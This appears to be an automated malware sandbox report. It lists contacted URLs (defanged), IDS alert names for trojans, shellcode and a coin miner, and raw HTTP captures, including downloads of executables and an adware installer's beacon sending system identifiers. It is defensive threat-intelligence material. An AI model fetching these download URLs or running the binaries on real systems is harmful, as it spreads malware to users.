hxxp://ocsp2.globalsign.com/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== 108.162.232.198
hxxp://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ 72.167.239.239
hxxp://install.plainsavingscenter.com/if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk=
hxxp://cdn1.lawfuldownload.com/V19/amipb.js 54.230.95.118
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://www.4threquest.me/010914s/010914i.htm
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://www.4threquest.me/010914s/contabilizar.php?id=230313
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== 72.167.239.239
hxxp://www.software-forus.com/CPUminer/cpuminer-x11opt-setup.exe 205.185.216.42
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc=
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://clients1.google.com/ocsp
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef
hxxp://www.4threquest.me/registro/310113f8.htm
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://ocsp2.globalsign.com/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== 108.162.232.198
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo=
hxxp://www.4threquest.me/registro/icone_cadeado.gif
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756
hxxp://www.4threquest.me/registro/carregando.gif
hxxp://www.nowtake.me/8Hk4o
hxxp://www.4threquest.me/310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://www.4threquest.me/ids/id230313/stats_confirma.htm
hxxp://www.4threquest.me/310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://pcmega.go2cloud.org/SL2
hxxp://download.mozilla.org/?product=firefox-34.0.5-complete&os=win&lang=en-US 63.245.215.111
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= 72.167.239.239
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8=
hxxp://www.1strequest.me/desprotetor_setup.exe
hxxp://www.4threquest.me/registro/top-line.gif


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response
SURICATA STREAM SHUTDOWN RST invalid ack
SURICATA STREAM Packet with invalid ack
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)
SURICATA STREAM FIN out of window

Traffic

GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html



GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,............. .........\.0!....B....A...f..qcE. -.
.8..D..-...0...)..d......I.T.R.K..aJ.Z3.O.-w.\*s...MgvD.....E..$..aW.Z
.&M.....O.B..0$J.....K....x.....o_.~...L.0..u..Ulx....#..LY2..y![...q.
.....MZ......^..4...c.V.:5m..]..Mz....E.....l..M..M.6...e.^N..t..QSG^.
....wC.g^......k.~.x........>.............( ....`.......1.........M
(..... .......^X....."...x..(V...... ...Xb.0....0.h_.-....D.i..H&...L6
...PF)..TVi..Xf...\v...`[email protected]&.f....t.Y..o.yg.x.Y.....g...
...v....p.z..|6...w..h..R....*...j:.....)....I*.......r.....F.....*...
......Zk........Kj....(..D ...L[[email protected]...
............n...{....;........'.........:.p....p...|...Z.1..{,.......,
....0....3?Ps. .|3.9..s.;....:.M..H'Ms.H..4.N..5.OS]u.6g]..=.<.
<<< skipped >>>

GET /010914s/010914i.htm HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4....
.s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4
...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{
C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc.
.25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0..
.......^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...g
b..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...
\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%
.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y.......
.8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\
o.U9..n.=Hj(...^...J8.;....g............`...G.....0......


GET /010914s/verificar_ip.php HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
78..............M-IT.()).M-,.,.U*JM J-.PRH.. I. .U2.....U.)...///.3).(
.*O-...M.704.44)..iHL....J,. .(..L.526064VW.....6.i.....0......


GET /010914s/contabilizar.php?id=230313 HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: EXPIRED
CC: UA
Content-Encoding: gzip
8e............u....0.E...P......"._....4.....7....p6.>rl....3"1....
w.rja?..,.....^..@l.^.k..X...){#rTb.......%T..:.....h.......J...fg....
...Z.......0......


GET /ids/id230313/stats_confirma.htm HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/contabilizar.php?id=230313
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: MISS
CC: UA
Content-Encoding: gzip
14........................0......



GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 01 May 2015 23:07:06 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."
c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..
a..{..y...{.........................................................!.
....@.,....)[email protected],..H.o.l:..(S.KZ.G..............j.... pwX.....@.
....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C
........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A
. .e7v.0...........C....e..P...9p..1........1 .>[email protected].. u.H.b../
[email protected].^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<
;;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B
 .zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@
t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g..
.<[email protected]........>...>......
..B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.
I0......ffAW....p......Q.\u..,[email protected]...
.`.......nDK...,..._d...xq.m........k...........n.A..;..



POST /thankyou.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1308
Host: VVV.amoninst.com

_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=193.138.244.231&cmdl=amisetup2899__9664.exe /s  /ver 1.1.2.41  /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3e5a8f2a30ab988ef7a611138130e98a¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT6.1SP1&sysid=915A4028688142931B5DDA64A4540CAD&sysid1=066389C9740F80692FC30C6511692204&te=1430435235&tid=&ts=1430435233&ver=1.1.2.41&vert=3&mhx=dd599d1761410d78de3549ee3ea8673841bec801&base=X3NydmxvZz0mYnJvd3Nlcj1pZSZjW015QmVzdE9mZmVyc1RvZGF5QlJdW3JdPTAuMDEmY1tNeUJlc3RPZmZlcnNUb2RheUJSXVtzXT0tMSZjW3VwZGF0ZXJdW3JdPTAmY1t1cGRhdGVyXVtzXT0tMSZjYXBwPXVwZGF0ZXImY2M9VUEmY2lkPTk2NjQmY2xpcD0xOTMuMTM4LjI0NC4yMzEmY21kbD1hbWlzZXR1cDI4OTlfXzk2NjQuZXhlIC9zICAvdmVyIDEuMS4yLjQxICAvdSBodHRwOi8vd3d3LmFtb25pbnN0LmNvbS9pbmRleC5waHAgL3RhIC9jaSA5NjY0IC9pIE15QmVzdE9mZmVyc1RvZGF5QlImY250PTNlNWE4ZjJhMzBhYjk4OGVmN2E2MTExMzgxMzBlOThhJmN1cnJlbnRfc2NyZWVuPUZpbmlzaF9MYXN0X1NjcmVlbiZpcz0tMzEmbmV0ZnM9LTMxJm9zPU5UNi4xU1AxJnN5c2lkPTkxNUE0MDI4Njg4MTQyOTMxQjVEREE2NEE0NTQwQ0FEJnN5c2lkMT0wNjYzODlDOTc0MEY4MDY5MkZDMzBDNjUxMTY5MjIwNCZ0ZT0xNDMwNDM1MjM1JnRpZD0mdHM9MTQzMDQzNTIzMyZ2ZXI9MS4xLjIuNDEmdmVydD0zAA==
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
....      ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..
Date: Thu, 30 Apr 2015 23:07:15 GMT..Server: Apache/2.2.15 (Red Hat)..
X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...
...      ....



GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120373, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:23:40 GMT
Expires: Sat, 02 May 2015 10:23:40 GMT
ETag: "befea096dacc08f0bc2d2ea14601c0a19709dbf1"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20150430222340Z0k0i0A0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,....i.O...\.....20150430222340Z....20150502
102340Z0...*.H..............&.9.9.....].Y....D....T......bf\.u.......y
T.=..v...N......J<..P'sX-&......D.-.."`o%L..7..Z..0...^2lm..-g{V...
..M..... .....ZCd.-.-...Cg..HL.....PL.C.d.I.......o..g..6..NR.N3..x...
4c5....F.....`C&\c..TX.p0.[......`EK.D......b[.gEb..1...3p.p[.....i-..
 ..9z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.
0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 .
.U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure C
ertificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....
US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..
U..."Go Daddy Validation Authority - G20.."0...*.H.............0......
...xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....
l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hE
Kb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.
S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U....
...0.0...U...........0...U.%..0... ......... .......0...U.......O.....
...f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.co
m/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000...
 ........"hXXp://crl.godaddy.com/repository/0...*.H...............
<<< skipped >>>


GET /registro/310113f8.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Wed, 11 Mar 2015 17:29:02 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
805.............Y.n.6..=?.....0[.d;..p...0']......h..,..m' .<{.=.^l
..dK...i.....J...xt..qtu.....p .....'...a.7n..:..Z.j ....i..m.N.1.XJ|&
lt;.. 8]DU.q..}........>..x..o.z'L9...-..*.,....f.j.`.*.JO0..A..g|.
....@R)./I$.......{.T..%..Y..._.x....]._...RS..c...s.V..^.i...O?W.U.`.
..........9.g,..t*:P...........n...\.>O.}.h.G......y7!"f..'.x...a.b
...... ....4Z..-......1...-.......&I.....][email protected]
..%.....Z..i...>.g...^n.x[.....~.q*....l.. .S.....Yp.....?..4.IH...
%.O...."...........x4.......T.n.b.Mi).R....9(.U.J5..|.....t`a...I*.U.s
.i.?Q"..A...s.0q..g4x.]u.|...Jl..y.....h.h.....i..U.~..UZ$4.^.h.i..A;.
x\[email protected][email protected]..,U..B&.5G!..QD.....c.V
c;..J.}2.E.^...^..T.L.B.k......c;....9SI.la.UC...&..%.......]V...nII..
-...S.._."...dVb.,~6.HS]..9Q@....,..b$UB..........<[email protected]...
;..0#.TE....adO...o?`......].xfh/..c^e.}.}.lO..V.......w...^pG`.`!) ..
..k2..p...0...V..f.{>o.g.....*.l..........='..X...Z.I.$i}..!Q.C..X/
.p$g;N6@v.:.....>..m,[email protected]...]...>.q8l.^.........}2.^.....
.[X..iL.... t.C.......y..C...6..r.7.C......F..]..PQ.....^.l.a..x......
$^....Y....]F-.6.{...fLy....h.Y.7<.Ic.8..D,O.....8H'.1.gx.H.^..I.P.
C4L.}.Qt>.^..v....L.A..xyJ.....[...8.g.mqzl>.6d.`..<.c7..fl..
N.......&.BRx.....H.._.~{{>.].T.9...(...Q....U.....vc.....=3BB.w5Z.
.(..7.xx...}.Gv.......[..]....5..K..........WC...........'v[F.v.8uc.._
.|A.'[email protected].{f'...Pn(X..Cw...K
.......&W...x4........l....V..7=...T~%.......0..&..3C.H.p..E...|.Y
<<< skipped >>>

GET /registro/icone_cadeado.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a(.2....aH........z......i........r........X..7..................
.....8.. .....x..g.................?.....7..E.....n....f...^..$..H....
..........[........2...........:...........z.......m...W..l...........
......... ...................\........h..h4.p......*...........4......
........ ..............u.....3........K....{(.....(...........#.....i.
.J..b..........m........o.....................N.................l.....
#................c.................|..........I0............>....{.
........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.
s........~..o .......................=..>....m...Z.....x...........
1........g........d......9*..............._....................z..t..}
........L..Y..B.....J..&.....0......................z>.. .q .......
....E.|.............!.......,....(.2........H..?;2n}.....|....H.....S.
..1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.
6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?
.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P..
.S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.
6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..
$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).
%[email protected].........(..3W....0xP.$".P.............X`*.......^.J....!. ..
......G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k......
....-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF
.......R...]d..".*;0"H.`....@r... .@[email protected].=k..@
<<< skipped >>>

GET /registro/carregando.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a . ........{...........................l..D..N..............L.}.
..........................6...........z..<..(..,.....v.....".....V.
....... ....................&........>.....t.................0.....
...B.................Z..$.....~..r..............|.....h..j........`...
.....x........X..2.................*..b..^.....p......................
.....................................................!..NETSCAPE2.0...
..!..Created with ajaxload.info.!.......,.... . ......................
)...).4.)...3....*.5..A..9@..... ..&.....<........ ........)KFN....
!.......%....."..!'.........,..D......#..6...`xU....-T......A. d .....
..1.. ...._.r`...A......Q.'.L.pH`A....Q0BKA....1.......F..`...c.pdld..
....(.`b.....R.p"...a.=xa!./{..6...B...?6.%b..Ru$`..2$....6dC..E.c!F(C
.A.S.%hE.......@.. ...$'rbP..I.)D.v.........(....wFj..2....3>X.p@..
cF<.:..I....T.....#.JD'.7....-.MK...%&...`...@.!.......,.... . ....
........TT).......I((K/.....4F....F......K....I........AFL..FA.....(.X
MDF..%....$..:(NI..........<....<(0.6[C..I...B!.$.EZ..3...Q.8.$.
.8V r`B."..o.n.)....O.`0..L..'."(H..c#.....B..?..081....[0........' .B
......~` A....FB(......M;z.".D<......bC....t1J...'U.j......!....$..
.....u.......8.{e..#Q........%.UP.N..(N.....D.&.....$s..`G...eJ&.8D0..
 A.....).....K.j..E....<H1."..B.j.:...N.<z...c..! @..b.c..!sP...
H.......!.......,.... . ..................E]A......K.5F#.....O ..%@-..
..........>@L..:...D.8'....N.[.<.-\..Q.'["&../_...%%:..M...O..%.
..T...:.&9A*G.,.N.&......J.......T.`.......s....B.Np.!...'..(.....
<<< skipped >>>


GET /img/Global/declineBG.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1527
Connection: keep-alive
x-amz-id-2: LsJpuXhB3IbHEy7ZHe7WV8uGeSQ9o9HFRMUuEjtSs00r6BYLEJZsLd1C2dR1aukm
x-amz-request-id: 93C41663D1D347D1
x-amz-meta-s3fox-filesize: 1527
x-amz-meta-s3fox-modifiedtime: 1385033566667
Last-Modified: Thu, 21 Nov 2013 11:43:23 GMT
x-amz-version-id: TJNGNP9J.pYgtH1WelxAjMHRSvYRyHyQ
ETag: "c3671f6a6b3932da75a4c6b57cd45614"
Accept-Ranges: bytes
[email protected] ImageReadyq.e&
lt;...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
